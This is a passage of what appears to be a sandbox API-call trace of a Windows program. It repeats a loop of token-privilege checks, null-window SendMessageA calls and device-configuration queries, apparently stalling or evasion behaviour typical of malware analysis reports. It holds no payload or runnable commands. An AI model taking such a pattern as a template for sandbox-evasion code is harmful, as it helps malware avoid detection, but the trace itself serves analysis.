TokenHandle=0x18fe80*=0x114) returned 1 [0084.747] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.747] SetLastError (dwErrCode=0x522) [0084.747] CloseHandle (hObject=0x114) returned 1 [0084.747] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.747] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.747] GetLastError () returned 0x578 [0084.747] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.747] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.747] GetCurrentThread () returned 0xfffffffe [0084.747] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.747] GetLastError () returned 0x3f0 [0084.747] GetCurrentProcess () returned 0xffffffff [0084.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.747] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.747] SetLastError (dwErrCode=0x522) [0084.747] CloseHandle (hObject=0x114) returned 1 [0084.747] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.747] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.747] GetLastError () returned 0x578 [0084.747] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.747] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.747] GetCurrentThread () returned 0xfffffffe [0084.747] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.747] GetLastError () returned 0x3f0 [0084.747] GetCurrentProcess () returned 0xffffffff [0084.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.747] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.747] SetLastError (dwErrCode=0x522) [0084.747] CloseHandle (hObject=0x114) returned 1 [0084.747] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.747] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.747] GetLastError () returned 0x578 [0084.747] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.747] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.747] GetCurrentThread () returned 0xfffffffe [0084.747] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.747] GetLastError () returned 0x3f0 [0084.747] GetCurrentProcess () returned 0xffffffff [0084.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.747] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.747] SetLastError (dwErrCode=0x522) [0084.748] CloseHandle (hObject=0x114) returned 1 [0084.748] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.748] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.748] GetLastError () returned 0x578 [0084.748] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.748] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.748] GetCurrentThread () returned 0xfffffffe [0084.748] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.748] GetLastError () returned 0x3f0 [0084.748] GetCurrentProcess () returned 0xffffffff [0084.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.748] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.748] SetLastError (dwErrCode=0x522) [0084.748] CloseHandle (hObject=0x114) returned 1 [0084.748] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.748] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.748] GetLastError () returned 0x578 [0084.748] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.748] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.748] GetCurrentThread () returned 0xfffffffe [0084.748] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.748] GetLastError () returned 0x3f0 [0084.748] GetCurrentProcess () returned 0xffffffff [0084.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.748] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.748] SetLastError (dwErrCode=0x522) [0084.748] CloseHandle (hObject=0x114) returned 1 [0084.748] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.748] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.748] GetLastError () returned 0x578 [0084.748] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.748] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.748] GetCurrentThread () returned 0xfffffffe [0084.748] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.748] GetLastError () returned 0x3f0 [0084.748] GetCurrentProcess () returned 0xffffffff [0084.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.748] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.748] SetLastError (dwErrCode=0x522) [0084.748] CloseHandle (hObject=0x114) returned 1 [0084.748] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.748] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.748] GetLastError () returned 0x578 [0084.748] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.748] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.748] GetCurrentThread () returned 0xfffffffe [0084.748] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.748] GetLastError () returned 0x3f0 [0084.748] GetCurrentProcess () returned 0xffffffff [0084.749] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.749] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.749] SetLastError (dwErrCode=0x522) [0084.749] CloseHandle (hObject=0x114) returned 1 [0084.749] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.749] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.749] GetLastError () returned 0x578 [0084.749] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.749] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.749] GetCurrentThread () returned 0xfffffffe [0084.749] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.749] GetLastError () returned 0x3f0 [0084.749] GetCurrentProcess () returned 0xffffffff [0084.749] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.749] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.749] SetLastError (dwErrCode=0x522) [0084.749] CloseHandle (hObject=0x114) returned 1 [0084.749] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.749] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.749] GetLastError () returned 0x578 [0084.749] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.749] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.749] GetCurrentThread () returned 0xfffffffe [0084.749] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.749] GetLastError () returned 0x3f0 [0084.749] GetCurrentProcess () returned 0xffffffff [0084.749] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.749] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.749] SetLastError (dwErrCode=0x522) [0084.749] CloseHandle (hObject=0x114) returned 1 [0084.749] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.749] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.749] GetLastError () returned 0x578 [0084.749] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.749] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.749] GetCurrentThread () returned 0xfffffffe [0084.749] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.749] GetLastError () returned 0x3f0 [0084.749] GetCurrentProcess () returned 0xffffffff [0084.749] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.749] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.749] SetLastError (dwErrCode=0x522) [0084.749] CloseHandle (hObject=0x114) returned 1 [0084.749] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.749] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.749] GetLastError () returned 0x578 [0084.749] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.749] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.750] GetCurrentThread () returned 0xfffffffe [0084.750] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.750] GetLastError () returned 0x3f0 [0084.750] GetCurrentProcess () returned 0xffffffff [0084.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.750] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.750] SetLastError (dwErrCode=0x522) [0084.750] CloseHandle (hObject=0x114) returned 1 [0084.750] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.750] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.750] GetLastError () returned 0x578 [0084.750] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.750] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.750] GetCurrentThread () returned 0xfffffffe [0084.750] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.750] GetLastError () returned 0x3f0 [0084.750] GetCurrentProcess () returned 0xffffffff [0084.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.750] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.750] SetLastError (dwErrCode=0x522) [0084.750] CloseHandle (hObject=0x114) returned 1 [0084.750] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.750] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.750] GetLastError () returned 0x578 [0084.750] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.750] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.750] GetCurrentThread () returned 0xfffffffe [0084.750] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.750] GetLastError () returned 0x3f0 [0084.750] GetCurrentProcess () returned 0xffffffff [0084.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.750] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.750] SetLastError (dwErrCode=0x522) [0084.750] CloseHandle (hObject=0x114) returned 1 [0084.750] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.750] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.750] GetLastError () returned 0x578 [0084.750] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.750] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.750] GetCurrentThread () returned 0xfffffffe [0084.750] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.750] GetLastError () returned 0x3f0 [0084.750] GetCurrentProcess () returned 0xffffffff [0084.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.750] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.750] SetLastError (dwErrCode=0x522) [0084.750] CloseHandle (hObject=0x114) returned 1 [0084.751] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.751] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.751] GetLastError () returned 0x578 [0084.751] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.751] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.751] GetCurrentThread () returned 0xfffffffe [0084.751] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.751] GetLastError () returned 0x3f0 [0084.751] GetCurrentProcess () returned 0xffffffff [0084.751] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.751] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.751] SetLastError (dwErrCode=0x522) [0084.751] CloseHandle (hObject=0x114) returned 1 [0084.751] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.751] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.751] GetLastError () returned 0x578 [0084.751] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.751] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.751] GetCurrentThread () returned 0xfffffffe [0084.751] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.751] GetLastError () returned 0x3f0 [0084.751] GetCurrentProcess () returned 0xffffffff [0084.751] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.751] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.751] SetLastError (dwErrCode=0x522) [0084.751] CloseHandle (hObject=0x114) returned 1 [0084.751] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.751] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.751] GetLastError () returned 0x578 [0084.751] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.751] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.751] GetCurrentThread () returned 0xfffffffe [0084.751] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.751] GetLastError () returned 0x3f0 [0084.861] GetCurrentProcess () returned 0xffffffff [0084.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.861] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.861] SetLastError (dwErrCode=0x522) [0084.861] CloseHandle (hObject=0x114) returned 1 [0084.861] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.861] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.861] GetLastError () returned 0x578 [0084.861] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.861] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.861] GetCurrentThread () returned 0xfffffffe [0084.861] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.861] GetLastError () returned 0x3f0 [0084.861] GetCurrentProcess () returned 0xffffffff [0084.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.861] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.861] SetLastError (dwErrCode=0x522) [0084.861] CloseHandle (hObject=0x114) returned 1 [0084.861] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.861] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.861] GetLastError () returned 0x578 [0084.861] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.861] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.861] GetCurrentThread () returned 0xfffffffe [0084.861] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.861] GetLastError () returned 0x3f0 [0084.861] GetCurrentProcess () returned 0xffffffff [0084.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.861] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.861] SetLastError (dwErrCode=0x522) [0084.861] CloseHandle (hObject=0x114) returned 1 [0084.861] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.861] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.861] GetLastError () returned 0x578 [0084.861] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.861] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.861] GetCurrentThread () returned 0xfffffffe [0084.861] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.861] GetLastError () returned 0x3f0 [0084.861] GetCurrentProcess () returned 0xffffffff [0084.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.862] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.862] SetLastError (dwErrCode=0x522) [0084.862] CloseHandle (hObject=0x114) returned 1 [0084.862] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.862] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.862] GetLastError () returned 0x578 [0084.862] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.862] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.862] GetCurrentThread () returned 0xfffffffe [0084.862] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.862] GetLastError () returned 0x3f0 [0084.862] GetCurrentProcess () returned 0xffffffff [0084.862] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.862] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.862] SetLastError (dwErrCode=0x522) [0084.862] CloseHandle (hObject=0x114) returned 1 [0084.862] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.862] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.862] GetLastError () returned 0x578 [0084.862] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.862] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.862] GetCurrentThread () returned 0xfffffffe [0084.862] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.862] GetLastError () returned 0x3f0 [0084.862] GetCurrentProcess () returned 0xffffffff [0084.862] OpenProcessToken (in: ProcessHandle=0xffffffff, 